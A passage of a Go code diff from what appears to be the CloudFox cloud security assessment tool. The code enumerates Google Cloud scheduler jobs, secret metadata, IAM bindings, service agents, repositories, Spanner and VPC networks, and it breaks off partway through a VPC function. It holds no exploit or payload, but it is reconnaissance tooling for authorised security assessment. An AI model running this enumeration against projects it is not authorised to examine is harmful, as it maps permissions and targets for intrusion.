+ Description string + State string // ENABLED, PAUSED, DISABLED, UPDATE_FAILED + Schedule string // Cron expression + TimeZone string + + // Target configuration + TargetType string // http, pubsub, appengine + TargetURI string // For HTTP targets + TargetHTTPMethod string // For HTTP targets + TargetTopic string // For Pub/Sub targets + TargetService string // For App Engine targets + TargetVersion string // For App Engine targets + + // Authentication + ServiceAccount string // OIDC or OAuth service account + AuthType string // OIDC, OAuth, or none + + // Retry configuration + RetryCount int64 + MaxRetryDuration string + MaxBackoff string + + // Timing + LastAttemptTime string + ScheduleTime string + Status string // Last attempt status +} + +// Jobs retrieves all Cloud Scheduler jobs in a project +func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := scheduler.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") + } + + var jobs []JobInfo + + // List jobs across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Jobs.List(parent) + err = call.Pages(ctx, func(page *scheduler.ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") + } + + return jobs, nil +} + +// parseJobInfo extracts relevant information from a Cloud Scheduler job +func parseJobInfo(job *scheduler.Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Description: job.Description, + State: job.State, + Schedule: job.Schedule, + TimeZone: job.TimeZone, + } + + // Extract location from job name + // Format: projects/{project}/locations/{location}/jobs/{name} + parts := 
strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + // Parse target configuration + if job.HttpTarget != nil { + info.TargetType = "http" + info.TargetURI = job.HttpTarget.Uri + info.TargetHTTPMethod = job.HttpTarget.HttpMethod + + // Check for OIDC token + if job.HttpTarget.OidcToken != nil { + info.AuthType = "OIDC" + info.ServiceAccount = job.HttpTarget.OidcToken.ServiceAccountEmail + } + + // Check for OAuth token + if job.HttpTarget.OauthToken != nil { + info.AuthType = "OAuth" + info.ServiceAccount = job.HttpTarget.OauthToken.ServiceAccountEmail + } + } + + if job.PubsubTarget != nil { + info.TargetType = "pubsub" + info.TargetTopic = extractName(job.PubsubTarget.TopicName) + } + + if job.AppEngineHttpTarget != nil { + info.TargetType = "appengine" + info.TargetURI = job.AppEngineHttpTarget.RelativeUri + info.TargetHTTPMethod = job.AppEngineHttpTarget.HttpMethod + if job.AppEngineHttpTarget.AppEngineRouting != nil { + info.TargetService = job.AppEngineHttpTarget.AppEngineRouting.Service + info.TargetVersion = job.AppEngineHttpTarget.AppEngineRouting.Version + } + } + + // Retry configuration + if job.RetryConfig != nil { + info.RetryCount = job.RetryConfig.RetryCount + info.MaxRetryDuration = job.RetryConfig.MaxRetryDuration + info.MaxBackoff = job.RetryConfig.MaxBackoffDuration + } + + // Timing info + info.LastAttemptTime = job.LastAttemptTime + info.ScheduleTime = job.ScheduleTime + if job.Status != nil { + info.Status = formatJobStatus(job.Status) + } + + return info +} + +// formatJobStatus formats the job status for display +func formatJobStatus(status *scheduler.Status) string { + if status.Code == 0 { + return "OK" + } + return fmt.Sprintf("Error %d: %s", status.Code, status.Message) +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName 
+} diff --git a/gcp/services/secretsService/secretsService.go b/gcp/services/secretsService/secretsService.go index 75b9f510..e9ff9357 100644 --- a/gcp/services/secretsService/secretsService.go +++ b/gcp/services/secretsService/secretsService.go @@ -2,11 +2,18 @@ package secretservice import ( "context" + "encoding/json" "fmt" + "io" + "net/http" + "strings" + "time" secretmanager "cloud.google.com/go/secretmanager/apiv1" secretmanagerpb "cloud.google.com/go/secretmanager/apiv1/secretmanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" + "golang.org/x/oauth2/google" "google.golang.org/api/iterator" ) @@ -18,6 +25,8 @@ type Iterator interface { type SecretsManagerClientWrapper struct { Closer func() error SecretLister func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator + IAMGetter func(ctx context.Context, secretName string) (*secretmanagerpb.Secret, error) + rawClient *secretmanager.Client } func (w *SecretsManagerClientWrapper) Close() error { @@ -26,14 +35,14 @@ func (w *SecretsManagerClientWrapper) Close() error { func (w *SecretsManagerClientWrapper) ListSecrets(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return w.SecretLister(ctx, req, opts...) - } type SecretsService struct { - Client *SecretsManagerClientWrapper + Client *SecretsManagerClientWrapper + session *gcpinternal.SafeSession } -// New function to facilitate using the ss client +// New creates a SecretsService with the provided client func New(client *secretmanager.Client) SecretsService { ss := SecretsService{ Client: &SecretsManagerClientWrapper{ @@ -41,17 +50,88 @@ func New(client *secretmanager.Client) SecretsService { SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return client.ListSecrets(ctx, req, opts...) 
}, + rawClient: client, }, } return ss } +// NewWithSession creates a SecretsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (SecretsService, error) { + ctx := context.Background() + var client *secretmanager.Client + var err error + + if session != nil { + client, err = secretmanager.NewClient(ctx, session.GetClientOption()) + } else { + client, err = secretmanager.NewClient(ctx) + } + if err != nil { + return SecretsService{}, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + ss := SecretsService{ + Client: &SecretsManagerClientWrapper{ + Closer: client.Close, + SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { + return client.ListSecrets(ctx, req, opts...) + }, + rawClient: client, + }, + session: session, + } + return ss, nil +} + +// IAMBinding represents a single IAM binding on a secret +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// SecretInfo contains secret metadata and security-relevant configuration type SecretInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectID"` - CreationTime string `json:"creationTime"` - Labels map[string]string `json:"labels"` - Rotation string `json:"rotation,omitempty"` + // Basic info + Name string `json:"name"` + ProjectID string `json:"projectID"` + + // Timestamps + CreationTime string `json:"creationTime"` + + // Replication + ReplicationType string `json:"replicationType"` // "automatic" or "user-managed" + ReplicaLocations []string `json:"replicaLocations,omitempty"` // Locations for user-managed replication + + // Encryption + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName,omitempty"` // KMS key for CMEK + + // Expiration + HasExpiration bool `json:"hasExpiration"` + ExpireTime string `json:"expireTime,omitempty"` + TTL string 
`json:"ttl,omitempty"` + + // Rotation + Rotation string `json:"rotation,omitempty"` + NextRotationTime string `json:"nextRotationTime,omitempty"` + RotationPeriod string `json:"rotationPeriod,omitempty"` + + // Version Management + VersionDestroyTTL string `json:"versionDestroyTtl,omitempty"` // Delayed destruction + + // Metadata + Labels map[string]string `json:"labels,omitempty"` + Annotations map[string]string `json:"annotations,omitempty"` + + // Topics (Pub/Sub notifications) + Topics []string `json:"topics,omitempty"` + + // Version Aliases + VersionAliases map[string]int64 `json:"versionAliases,omitempty"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings,omitempty"` } func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { @@ -63,21 +143,234 @@ func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { ctx := context.Background() it := ss.Client.ListSecrets(ctx, req) for { - resp, err := it.Next() //Here it errors out + resp, err := it.Next() if err == iterator.Done { break } if err != nil { - return nil, fmt.Errorf("failed to list secrets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } - secrets = append(secrets, SecretInfo{ + secret := SecretInfo{ Name: resp.Name, ProjectID: projectID, - CreationTime: resp.CreateTime.AsTime().String(), + CreationTime: resp.CreateTime.AsTime().Format(time.RFC3339), Labels: resp.Labels, - Rotation: resp.Rotation.String(), - }) + Annotations: resp.Annotations, + } + + // Parse replication type + if resp.Replication != nil { + switch r := resp.Replication.Replication.(type) { + case *secretmanagerpb.Replication_Automatic_: + secret.ReplicationType = "automatic" + // Check for CMEK in automatic replication + if r.Automatic != nil && r.Automatic.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = r.Automatic.CustomerManagedEncryption.KmsKeyName + } else { + secret.EncryptionType = "Google-managed" 
+ } + case *secretmanagerpb.Replication_UserManaged_: + secret.ReplicationType = "user-managed" + if r.UserManaged != nil { + for _, replica := range r.UserManaged.Replicas { + secret.ReplicaLocations = append(secret.ReplicaLocations, replica.Location) + // Check for CMEK in user-managed replication + if replica.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = replica.CustomerManagedEncryption.KmsKeyName + } + } + } + if secret.EncryptionType == "" { + secret.EncryptionType = "Google-managed" + } + } + } + + // Parse expiration + if resp.Expiration != nil { + secret.HasExpiration = true + switch e := resp.Expiration.(type) { + case *secretmanagerpb.Secret_ExpireTime: + if e.ExpireTime != nil { + secret.ExpireTime = e.ExpireTime.AsTime().Format(time.RFC3339) + } + case *secretmanagerpb.Secret_Ttl: + if e.Ttl != nil { + secret.TTL = e.Ttl.AsDuration().String() + } + } + } + + // Parse rotation + if resp.Rotation != nil { + secret.Rotation = "enabled" + if resp.Rotation.NextRotationTime != nil { + secret.NextRotationTime = resp.Rotation.NextRotationTime.AsTime().Format(time.RFC3339) + } + if resp.Rotation.RotationPeriod != nil { + secret.RotationPeriod = resp.Rotation.RotationPeriod.AsDuration().String() + } + } else { + secret.Rotation = "disabled" + } + + // Get VersionDestroyTTL via REST API (may not be available in all SDK versions) + ss.enrichSecretFromRestAPI(ctx, &secret) + + // Parse topics + if len(resp.Topics) > 0 { + for _, topic := range resp.Topics { + secret.Topics = append(secret.Topics, topic.Name) + } + } + + // Parse version aliases + if len(resp.VersionAliases) > 0 { + secret.VersionAliases = resp.VersionAliases + } + + // Get IAM policy for the secret + iamBindings := ss.getSecretIAMPolicy(ctx, resp.Name) + secret.IAMBindings = iamBindings + + secrets = append(secrets, secret) } return secrets, nil } + +// getSecretIAMPolicy retrieves the IAM policy for a secret +func (ss *SecretsService) 
getSecretIAMPolicy(ctx context.Context, secretName string) []IAMBinding { + var bindings []IAMBinding + + if ss.Client.rawClient == nil { + return bindings + } + + // Get IAM policy using the raw client + policy, err := ss.Client.rawClient.IAM(secretName).Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + } + bindings = append(bindings, binding) + } + } + + return bindings +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// secretAPIResponse represents the raw JSON response from Secret Manager API +// to capture fields that may not be in the SDK yet +type secretAPIResponse struct { + VersionDestroyTtl string `json:"versionDestroyTtl,omitempty"` +} + +// enrichSecretFromRestAPI fetches additional secret fields via direct HTTP request +// that may not be available in the Go SDK version +func (ss *SecretsService) enrichSecretFromRestAPI(ctx context.Context, secret *SecretInfo) { + var accessToken string + + // Try to use session token if available + if ss.session != nil { + token, err := 
ss.session.GetToken(ctx) + if err == nil { + accessToken = token + } + } + + // Fall back to default credentials if no session token + if accessToken == "" { + creds, err := google.FindDefaultCredentials(ctx, "https://www.googleapis.com/auth/cloud-platform") + if err != nil { + return + } + token, err := creds.TokenSource.Token() + if err != nil { + return + } + accessToken = token.AccessToken + } + + // Build the API URL + // Secret name format: projects/{project}/secrets/{secret} + url := fmt.Sprintf("https://secretmanager.googleapis.com/v1/%s", secret.Name) + + // Create request + req, err := http.NewRequestWithContext(ctx, "GET", url, nil) + if err != nil { + return + } + req.Header.Set("Authorization", "Bearer "+accessToken) + + // Make request + client := &http.Client{} + resp, err := client.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return + } + + // Read response body + body, err := io.ReadAll(resp.Body) + if err != nil { + return + } + + // Parse JSON + var apiResp secretAPIResponse + if err := json.Unmarshal(body, &apiResp); err != nil { + return + } + + // Parse VersionDestroyTTL + if apiResp.VersionDestroyTtl != "" { + // Parse duration string (e.g., "86400s" for 1 day) + if dur, err := time.ParseDuration(apiResp.VersionDestroyTtl); err == nil { + secret.VersionDestroyTTL = dur.String() + } else { + // If parsing fails, use the raw value + secret.VersionDestroyTTL = apiResp.VersionDestroyTtl + } + } +} diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go new file mode 100644 index 00000000..1288d029 --- /dev/null +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -0,0 +1,236 @@ +package serviceagentsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +type 
ServiceAgentsService struct{} + +func New() *ServiceAgentsService { + return &ServiceAgentsService{} +} + +// ServiceAgentInfo represents a Google-managed service agent +type ServiceAgentInfo struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + ServiceName string `json:"serviceName"` + AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. + Roles []string `json:"roles"` + IsCrossProject bool `json:"isCrossProject"` + Description string `json:"description"` +} + +// KnownServiceAgents maps service agent patterns to their descriptions +var KnownServiceAgents = map[string]struct { + Service string + Description string +}{ + "@cloudservices.gserviceaccount.com": { + Service: "Google APIs", + Description: "Google APIs Service Agent - manages resources on behalf of Google Cloud services", + }, + "@compute-system.iam.gserviceaccount.com": { + Service: "Compute Engine", + Description: "Compute Engine Service Agent - manages Compute Engine resources", + }, + "@container-engine-robot.iam.gserviceaccount.com": { + Service: "GKE", + Description: "Kubernetes Engine Service Agent - manages GKE clusters", + }, + "@cloudbuild.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Account - runs build jobs", + }, + "@gcp-sa-cloudbuild.iam.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Agent - manages Cloud Build resources", + }, + "@cloudcomposer-accounts.iam.gserviceaccount.com": { + Service: "Composer", + Description: "Cloud Composer Service Agent - manages Airflow environments", + }, + "@dataflow-service-producer-prod.iam.gserviceaccount.com": { + Service: "Dataflow", + Description: "Dataflow Service Agent - manages Dataflow jobs", + }, + "@gcp-sa-dataproc.iam.gserviceaccount.com": { + Service: "Dataproc", + Description: "Dataproc Service Agent - manages Dataproc clusters", + }, + "@gcp-sa-pubsub.iam.gserviceaccount.com": { + Service: "Pub/Sub", + Description: "Pub/Sub 
Service Agent - manages Pub/Sub resources", + }, + "@serverless-robot-prod.iam.gserviceaccount.com": { + Service: "Cloud Run/Functions", + Description: "Serverless Service Agent - manages serverless resources", + }, + "@gcp-sa-cloudscheduler.iam.gserviceaccount.com": { + Service: "Cloud Scheduler", + Description: "Cloud Scheduler Service Agent", + }, + "@gcp-sa-bigquery.iam.gserviceaccount.com": { + Service: "BigQuery", + Description: "BigQuery Service Agent - manages BigQuery resources", + }, + "@gcp-sa-artifactregistry.iam.gserviceaccount.com": { + Service: "Artifact Registry", + Description: "Artifact Registry Service Agent", + }, + "@gcp-sa-secretmanager.iam.gserviceaccount.com": { + Service: "Secret Manager", + Description: "Secret Manager Service Agent", + }, + "@gcp-sa-firestore.iam.gserviceaccount.com": { + Service: "Firestore", + Description: "Firestore Service Agent", + }, + "@gcp-sa-cloud-sql.iam.gserviceaccount.com": { + Service: "Cloud SQL", + Description: "Cloud SQL Service Agent", + }, + "@gcp-sa-logging.iam.gserviceaccount.com": { + Service: "Cloud Logging", + Description: "Cloud Logging Service Agent", + }, + "@gcp-sa-monitoring.iam.gserviceaccount.com": { + Service: "Cloud Monitoring", + Description: "Cloud Monitoring Service Agent", + }, +} + +// GetServiceAgents retrieves all service agents with IAM bindings +func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgentInfo, error) { + ctx := context.Background() + service, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var agents []ServiceAgentInfo + + // Get IAM policy + policy, err := service.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + // Track which service agents we've seen + seenAgents := 
make(map[string]*ServiceAgentInfo) + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if !strings.HasPrefix(member, "serviceAccount:") { + continue + } + + email := strings.TrimPrefix(member, "serviceAccount:") + + // Check if it's a service agent + agentType, description := s.identifyServiceAgent(email) + if agentType == "" { + continue // Not a service agent + } + + // Check for cross-project access + isCrossProject := !strings.Contains(email, projectID) + + // Add or update agent + if agent, exists := seenAgents[email]; exists { + agent.Roles = append(agent.Roles, binding.Role) + } else { + agent := &ServiceAgentInfo{ + Email: email, + ProjectID: projectID, + ServiceName: agentType, + AgentType: agentType, + Roles: []string{binding.Role}, + IsCrossProject: isCrossProject, + Description: description, + } + seenAgents[email] = agent + } + } + } + + // Convert to slice + for _, agent := range seenAgents { + agents = append(agents, *agent) + } + + return agents, nil +} + +func (s *ServiceAgentsService) identifyServiceAgent(email string) (string, string) { + // Check known patterns + for suffix, info := range KnownServiceAgents { + if strings.HasSuffix(email, suffix) { + return info.Service, info.Description + } + } + + // Check for generic service agent patterns + if strings.Contains(email, "@gcp-sa-") { + // Extract service name from gcp-sa-{service} + parts := strings.Split(email, "@") + if len(parts) == 2 { + saPart := parts[1] + if strings.HasPrefix(saPart, "gcp-sa-") { + serviceName := strings.TrimPrefix(saPart, "gcp-sa-") + serviceName = strings.Split(serviceName, ".")[0] + return serviceName, fmt.Sprintf("%s Service Agent", serviceName) + } + } + } + + // Check for project-specific service agents + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + return "Compute Engine", "Default Compute Engine service account" + } + + if strings.Contains(email, "@appspot.gserviceaccount.com") { + return "App 
Engine", "App Engine default service account" + } + + return "", "" +} + +// GetDefaultServiceAccounts returns the default service accounts for a project +func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, projectNumber string) []ServiceAgentInfo { + var defaults []ServiceAgentInfo + + // Google APIs Service Agent + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@cloudservices.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Google APIs", + AgentType: "Google APIs", + Description: "Google APIs Service Agent - automatically created, manages resources on behalf of Google Cloud services", + }) + + // Compute Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Compute Engine", + AgentType: "Compute Engine", + Description: "Default Compute Engine service account - used by instances without explicit SA", + }) + + // App Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID), + ProjectID: projectID, + ServiceName: "App Engine", + AgentType: "App Engine", + Description: "App Engine default service account", + }) + + return defaults +} diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go new file mode 100644 index 00000000..7d2b7f31 --- /dev/null +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -0,0 +1,115 @@ +package sourcereposservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + sourcerepo "google.golang.org/api/sourcerepo/v1" +) + +type SourceReposService struct{} + +func New() *SourceReposService { + return &SourceReposService{} +} + +// RepoInfo represents a Cloud Source Repository +type RepoInfo struct { + Name string `json:"name"` + 
ProjectID string `json:"projectId"` + URL string `json:"url"` + Size int64 `json:"size"` + MirrorConfig bool `json:"mirrorConfig"` + MirrorURL string `json:"mirrorUrl"` + PubsubConfigs int `json:"pubsubConfigs"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ListRepos retrieves all Cloud Source Repositories in a project +func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { + ctx := context.Background() + service, err := sourcerepo.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + var repos []RepoInfo + + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.Repos.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + for _, repo := range resp.Repos { + info := s.parseRepo(repo, projectID) + + // Get IAM policy for this repo + iamBindings := s.getRepoIAMBindings(service, repo.Name) + info.IAMBindings = iamBindings + + repos = append(repos, info) + } + + return repos, nil +} + +// getRepoIAMBindings retrieves IAM bindings for a repository +func (s *SourceReposService) getRepoIAMBindings(service *sourcerepo.Service, repoName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Repos.GetIamPolicy(repoName).OptionsRequestedPolicyVersion(3).Do() + if err != nil { + // Silently skip if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) RepoInfo { + // Extract repo name from full path + name := 
repo.Name + if strings.Contains(name, "/") { + parts := strings.Split(name, "/") + name = parts[len(parts)-1] + } + + info := RepoInfo{ + Name: name, + ProjectID: projectID, + URL: repo.Url, + Size: repo.Size, + } + + // Check for mirror configuration + if repo.MirrorConfig != nil { + info.MirrorConfig = true + info.MirrorURL = repo.MirrorConfig.Url + } + + // Count pubsub configs + if repo.PubsubConfigs != nil { + info.PubsubConfigs = len(repo.PubsubConfigs) + } + + return info +} + diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go new file mode 100644 index 00000000..db8e12b0 --- /dev/null +++ b/gcp/services/spannerService/spannerService.go @@ -0,0 +1,181 @@ +package spannerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerService { + return &SpannerService{} +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +type SpannerInstanceInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Config string `json:"config"` + NodeCount int64 `json:"nodeCount"` + State string `json:"state"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerDatabaseInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + InstanceName string `json:"instanceName"` + State string `json:"state"` + EncryptionType string `json:"encryptionType"` + KmsKeyName string `json:"kmsKeyName"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerResult struct { + Instances []SpannerInstanceInfo + Databases []SpannerDatabaseInfo +} + +// 
ListInstancesAndDatabases retrieves all Spanner instances and databases with IAM bindings +func (s *SpannerService) ListInstancesAndDatabases(projectID string) (*SpannerResult, error) { + ctx := context.Background() + service, err := spanner.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + result := &SpannerResult{ + Instances: []SpannerInstanceInfo{}, + Databases: []SpannerDatabaseInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + req := service.Projects.Instances.List(parent) + err = req.Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := SpannerInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Config: extractName(instance.Config), + NodeCount: instance.NodeCount, + State: instance.State, + } + + // Get IAM bindings for this instance + info.IAMBindings = s.getInstanceIAMBindings(service, ctx, instance.Name) + + result.Instances = append(result.Instances, info) + + // Get databases for this instance + databases := s.listDatabases(service, ctx, instance.Name, projectID) + result.Databases = append(result.Databases, databases...) 
+ } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return result, nil +} + +// getInstanceIAMBindings retrieves IAM bindings for an instance +func (s *SpannerService) getInstanceIAMBindings(service *spanner.Service, ctx context.Context, instanceName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.GetIamPolicy(instanceName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// listDatabases retrieves all databases for an instance with their IAM bindings +func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Context, instanceName string, projectID string) []SpannerDatabaseInfo { + var databases []SpannerDatabaseInfo + + req := service.Projects.Instances.Databases.List(instanceName) + _ = req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { + for _, db := range page.Databases { + dbInfo := SpannerDatabaseInfo{ + Name: extractName(db.Name), + FullName: db.Name, + ProjectID: projectID, + InstanceName: extractName(instanceName), + State: db.State, + } + + // Determine encryption type + if db.EncryptionConfig != nil && db.EncryptionConfig.KmsKeyName != "" { + dbInfo.EncryptionType = "CMEK" + dbInfo.KmsKeyName = db.EncryptionConfig.KmsKeyName + } else { + dbInfo.EncryptionType = "Google-managed" + } + + // Get IAM bindings for this database + dbInfo.IAMBindings = s.getDatabaseIAMBindings(service, ctx, db.Name) + + databases = append(databases, dbInfo) + } + return nil + }) + + return databases +} + +// getDatabaseIAMBindings retrieves IAM bindings for a database +func (s *SpannerService) getDatabaseIAMBindings(service *spanner.Service, ctx context.Context, databaseName string) 
[]IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.Databases.GetIamPolicy(databaseName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go new file mode 100644 index 00000000..2da8705a --- /dev/null +++ b/gcp/services/vpcService/vpcService.go @@ -0,0 +1,324 @@ +package vpcservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type VPCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCService { + return &VPCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCService { + return &VPCService{session: session} +} + +// VPCNetworkInfo represents a VPC network +type VPCNetworkInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + AutoCreateSubnetworks bool `json:"autoCreateSubnetworks"` + RoutingMode string `json:"routingMode"` // REGIONAL or GLOBAL + MTU int64 `json:"mtu"` + Subnetworks []string `json:"subnetworks"` + Peerings []string `json:"peerings"` + FirewallPolicyCount int `json:"firewallPolicyCount"` +} + +// SubnetInfo represents a subnetwork +type SubnetInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Region string `json:"region"` + IPCidrRange string `json:"ipCidrRange"` + GatewayAddress string `json:"gatewayAddress"` + PrivateIPGoogleAccess bool 
`json:"privateIpGoogleAccess"` + Purpose string `json:"purpose"` + EnableFlowLogs bool `json:"enableFlowLogs"` + SecondaryIPRanges []string `json:"secondaryIpRanges"` +} + +// VPCPeeringInfo represents a VPC peering connection +type VPCPeeringInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + PeerNetwork string `json:"peerNetwork"` + PeerProjectID string `json:"peerProjectId"` + State string `json:"state"` + ExportCustomRoutes bool `json:"exportCustomRoutes"` + ImportCustomRoutes bool `json:"importCustomRoutes"` + ExchangeSubnetRoutes bool `json:"exchangeSubnetRoutes"` +} + +// RouteInfo represents a route +type RouteInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + DestRange string `json:"destRange"` + NextHopType string `json:"nextHopType"` + NextHop string `json:"nextHop"` + Priority int64 `json:"priority"` + Tags []string `json:"tags"` +} + +// ListVPCNetworks retrieves all VPC networks +func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + 